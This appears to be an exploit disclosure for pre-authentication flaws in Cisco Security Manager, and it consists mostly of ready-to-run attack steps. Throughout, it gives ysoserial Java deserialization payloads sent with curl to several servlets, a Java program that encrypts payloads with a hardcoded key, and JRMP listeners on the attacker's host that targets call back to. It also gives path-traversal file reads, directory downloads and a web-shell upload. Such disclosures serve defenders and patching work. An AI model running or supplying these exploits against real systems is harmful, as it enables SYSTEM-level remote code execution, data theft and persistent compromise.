Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.
Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.
Requirement: Download commons-beanutils-1.6.1.jar from central maven repository.
java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils
curl -k --request POST --data-binary "@payload_CommonsBeanutils" https://[TARGET_HOST]/CSCOnm/servlet/SecretService.jsp
Compile JaasEncryptor.java and replace the b64Payload content:
import java.security.InvalidKeyException;
import java.util.Base64;
import com.cisco.nm.cmf.security.jaas.BlobCrypt;
public class JaasEncryptor {
public static void main(String args[]) {
String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";
byte[] payload = Base64.getDecoder().decode(b64Payload);
byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5};
byte[] enc = BlobCrypt.encryptArray(payload, key);
System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc));
byte[] dec = BlobCrypt.decryptArray(enc, key);
}
}
Prepare JRMP Listener:
java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 443
java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:443' | base64 -w0
Compile encrypted payload:
javac -cp [YOUR_PATH]]/server_jars_classes/jars.jar:./ JaasEncryptor2.java; java -cp [YOUR_PATH]/server_jars_classes/jars.jar:./ JaasEncryptor
Send payload to Servlet with parameters cmd=data + new line + data=[ENCRYPTED_PAYLOAD].
Prepare JRMP Listener:
java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"
java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:1337' > payload_JRMP1_2
Send request:
curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.AuthTokenServlet
Prepare JRMP listener:
java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"
java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_3
Send request:
curl -k --request POST --data-binary "@payload_JRMP1_3" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.ClientServicesServlet
java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils1_2
curl -i -s -k -X $'POST' -H $'Content-Type: application/octet-stream' -H $'CTM-URN: com-cisco-nm-vms-ipintel-IpIntelligenceApi' -H $'CTM-VERSION: 1.5' -H $'CTM-PRODUCT-ID: /C:/Program Files (x86)/CSCOpx/MDC/tomcat/vms/athena/WEB-INF/lib/' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'User-Agent: Java/1.8.0_222' -H $'Host: [TARGET_IP]' -H $'Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' -H $'Connection: keep-alive' --data-binary "@payload_CommonsBeanutils1_2" $'https://[TARGET_IP]/athena/CTMServlet'
GET /athena/xdmProxy/xdmConfig[RELATIVE_PATH_TO_FILE]
GET /athena/xdmProxy/xdmResources[RELATIVE_PATH_TO_FILE]?dmTargetType=TARGET.IDS&dmOsVersion=7.&command=editConfigDelta
Write a web shell e.g.
POST /cwhp/XmpFileUploadServlet?maxFileSize=100
Normal multi-part e.g. writing web shell in filename with ../../MDC/tomcat/webapps/cwhp/testme.jsp.
GET /cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=[RELATIVE_PATH_TO_DIRECTORY]&readmeText=1
This will respond with a ZIP file containing all files from the directory.
GET /cwhp/SampleFileDownloadServlet?downloadZipFileName=pwned&downloadFiles=README&downloadLocation=[RELATIVE_PATH_TO_DIRECTORY]
This will respond with a ZIP file containing all files from the directory.
GET /athena/itf/resultsFrame.jsp?filename=[RELATIVE_PATH_TO_FILE]
See also https://de.tenable.com/security/research/tra-2017-23
java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"
java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_2
curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.SecretServiceServlet